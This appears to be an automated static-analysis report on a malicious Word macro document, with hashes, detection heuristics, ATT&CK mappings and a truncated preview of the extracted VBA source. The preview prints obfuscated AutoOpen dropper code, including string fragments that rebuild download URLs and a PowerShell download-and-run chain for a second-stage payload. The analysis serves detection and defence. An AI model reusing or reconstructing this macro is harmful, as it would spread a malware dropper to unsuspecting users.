Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5d7d6566cb33050a…

MALICIOUS

Office (OLE)

234.5 KB Created: 2017-12-28 14:18:00 Authoring application: Microsoft Office Word First seen: 2018-01-08
MD5: 3c11e6b84ce9d298de0e50bbe6f79bc4 SHA-1: b29cf83101cb269b72e8c2d04960dce5cca63566 SHA-256: 5d7d6566cb33050ac412edf6058da583b4351e8bb3ab0c2b312348eda91524be
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The critical heuristic 'OLE_VBA_SHELL' and the presence of VBA macros, specifically an 'AutoOpen' macro, indicate that the document is designed to execute code upon opening. The VBA script reconstructs a URL, 'http://argzS+eUY+eUYdiamugzeUY+eUYS++gzSlgzS+g+zStgzS+gzSikgzS+gzSagzS+gzSryagzS+gzS.com/V8gzS+gzS8bseUY+eUYkk/', which is likely used to download and execute a second-stage payload. The ClamAV detection 'Img.Dropper.PhishingLure-6443153-0' further supports its malicious nature as a dropper for phishing lures.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://argzS+eUY+e In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 77961 bytes
SHA-256: 0d97e7b982d74230ad9f44834d85baf2d2522aa90ca7a5fc9222342d371f3bed
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jXzUmqFmYFoK"
Function KwsScYOlpDsv()
On Error Resume Next
MbdjwiE = (NEmiuBWnP - Rnd(43 * Tan(ikXUlKKwH)) / YZDTOjkmV * Oct(PDVJTPhm) * AYMIXNWajO / Oct(MOwiuoBT - Chr(250) + 581 - ChrB(LRjSICiPO)) - 389 + WcXZHoM)
CKJbclOhwB = (jpukbFUNUqS - Rnd(43 * Tan(SvoEaPilEz)) / HwziMzr * Oct(zCAbnJas) * pzABGibRIIYws / Oct(VhmnndbHN - Chr(250) + 581 - ChrB(jUURTBuzXov)) - 389 + wBASWMDr)
ArzfscqDqjR = Mid("jbzsPRWY9N9OHY2wzsCfV'tp:/gzS+gzS'+'/meeUY+eUYdiamugzeUY+eUYS'+'+gzSlgzS+g'+'zStgzS+gzSikgzS+gzSagzS+gzSryagzS+gzS.com/V8gzS+gzS8bseUY+eUYkk/,http://argzS+eUY+e'+'UYgzStean'+'dinopegzSehitIliiiJhvD7lo", 22, 164)
OpNXwt = (jGsIDXMuB - Rnd(43 * Tan(rPiOOWOi)) / tzUjHMfsfoooq * Oct(XVNXCOMFNBXY) * XHNALYzSQLWlwY / Oct(jFMSBhGtBzM - Chr(250) + 581 - ChrB(domTMjNHlS)) - 389 + dQqPGJqlFqhYH)
XRGdj = (btFAmluWbEcsiA - Rnd(43 * Tan(BLBLXQrMV)) / GVSJMpzq * Oct(wcDdSFvLzNCmC) * pDbWuch / Oct(hjtfPcMOOiCu - Chr(250) + 581 - ChrB(pwijFbF)) - 389 + wSVEScFkTDOHOv)
OYYJXJfq = (EXQQNMAzEWiir - Rnd(43 * Tan(CjQtORiC)) / SAjLOGiv * Oct(iiHMwrXGn) * LUlbRfjVZoK / Oct(GCMwQiAmsaaOA - Chr(250) + 581 - ChrB(DqmZVIiEq)) - 389 + hYSfilEHFnYFz)
aLBsrs = Mid("i868[sTrING][ChAr]39) | . ((geT-VAriable '*mDR*').Name[3,11,2]-jOiN'')EBm58fSv43GjhssHGG", 5, 66)
azLDjQZ = (kmpTwiwYj - Rnd(43 * Tan(AzFtmoAb)) / jRXazzHdvbnmn * Oct(fwzPIHMzulwRcA) * jPNfaMBMMsTrE / Oct(wwVNFav - Chr(250) + 581 - ChrB(YrUcjXlifWGmP)) - 389 + ZHNidlkX)
wQMrwK = (zBqLZfiNdpXwCE - Rnd(43 * Tan(ikpkRvfXZtaN)) / wzwSkjllwIhwK * Oct(BqNzCWilibBzB) * dRRzSmQdsF / Oct(VSAfcImHE - Chr(250) + 581 - ChrB(hLuXqOLRUQl)) - 389 + RHhrijXaXzH)
JCmojii = (PHwzpbEXavrrW - Rnd(43 * Tan(wcibhMzk)) / nkWNAWwKE * Oct(CEUnZwC) * zjqYUDwOGzK / Oct(KrfpIMS - Chr(250) + 581 - ChrB(DAdlmpTGd)) - 389 + EiflzEbPQSRlQ)
FGoaiz = Mid("ZwSOivIdIZY+eUYngzS+gzSloadgzS+gzSFilegzS+gzS(IgzS+gzSvragzS+gzSbc.ToStrigzS+geUY+eUYzSngzS+gzSg(gzS+gzS),gzS+gzS IgzS+gzS'+'v'+'rhugzS+gzSas);Invoke-ItegzS+gzSm(5ljEvwECYC8h2zPmbT0", 11, 152)
zMwIAzwnpY = (hEiFFTPszpwF - Rnd(43 * Tan(bbXFMYocqB)) / wlaFjiHkEHqmk * Oct(LABthcK) * UGEzVLYSKqC / Oct(GUtJISiMBPkp - Chr(250) + 581 - ChrB(wAXniIZiXRTBj)) - 389 + wLmzAjzz)
lHfErnm = (oXmlYLizPjZXu - Rnd(43 * Tan(GcfzGOJjGGE)) / UHipjDYpwbhzSP * Oct(CGRRjAluQCYav) * FQfhirXUZDW / Oct(EjfufiqYGcppUt - Chr(250) + 581 - ChrB(NOmIccKtLCRo)) - 389 + ThjNulvEOW)
qQpYhVMd = (HskOtwaFWOMWK - Rnd(43 * Tan(ibhdDiD)) / IZJmBORkGo * Oct(JPvwufjzMzmXml) * HWSFvQoi / Oct(LFHzLnlIXXBk - Chr(250) + 581 - ChrB(cnwTlqbVCWAq)) - 389 + uRAsiVhK)
UCqTz = Mid("K05rKJpXA2zU8bHzz1rpbij9RNVQn'PgzS'+'+gzSFNo/,http:geUY+eU'+'YzS+gzS//gzS+gzSwgzS+gzSwwgzS+gzS.dgzS+gzSrgz'+'S+geUY+eUYzSmkeUY+eUYagzS+gzS.ir/PeUY+eUY60u/gzS+gzS,ht'+1RTDVAoIq", 30, 137)
oAaJWbX = (tjXXdapNlI - Rnd(43 * Tan(GnutVtnU)) / NqSFYvbujwdws * Oct(OsFnQkMEC) * IatSBPBRu / Oct(JDRSwiwuinf - Chr(250) + 581 - ChrB(OXjAQGXj)) - 389 + JnDwwBJtTwM)
DEwfVFDAwH = (TIqnBPj - Rnd(43 * Tan(aLLinBzW)) / BKZcFRwZMffqCS * Oct(YAdHXlPZcrqPLz) * LntutLpYN / Oct(rOpjDVXtPGmYp - Chr(250) + 581 - ChrB(MmkzlOBnctTszH)) - 389 + jjcPQfXZqY)
FGzHLWWQTc = (OFLbnoi - Rnd(43 * Tan(RZPkzMVmAzuu)) / wzQOVAjp * Oct(LqTHASV) * cSozNkXSzl / Oct(WsUCRsQFvNR - Chr(250) + 581 - ChrB(BwQOZRpMDRbWc)) - 389 + NkPsvWP)
tCujVKP = Mid("FjpYvPjNkYa'+'vgzS+gzS:publicgzS+g'+'z'+'S gzS+gzS+gzS+gzS qeUY+eUYkgaR1'+'geUY+eUYzS+gzSqgzS+gzSkg + gz'+'S+gzSeUY+eUYIvgzS+gzSr'+'karapgzS+gzSasgzS+gjzlZqaN0XK5", 12, 140)
FHYQpzYnsJY = (TWvrfnwuiG - Rnd(43 * Tan(snzqElvPLYP)) / fWJJYSoMtY * Oct(virkOjuCZ) * IqpQZblia / Oct(wDBQUViZc - Chr(250) + 581 - ChrB(uhTXDLMBhjQWqC)) - 389 + jUszqCiTKT)
VQqCF = (YRlvodFw - Rnd(43 * Tan(cQNNfHmvs)) / GiNlYSBX * Oct(aoLvzWcEKjJ) * jKGwVhwzzQO / Oct(DucLjMc - Chr(250) + 581 - ChrB(GiYiRVNqCDbM)) - 389 + jXUGnDkDXdJa)
wHoTAwud = (dbPsC
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.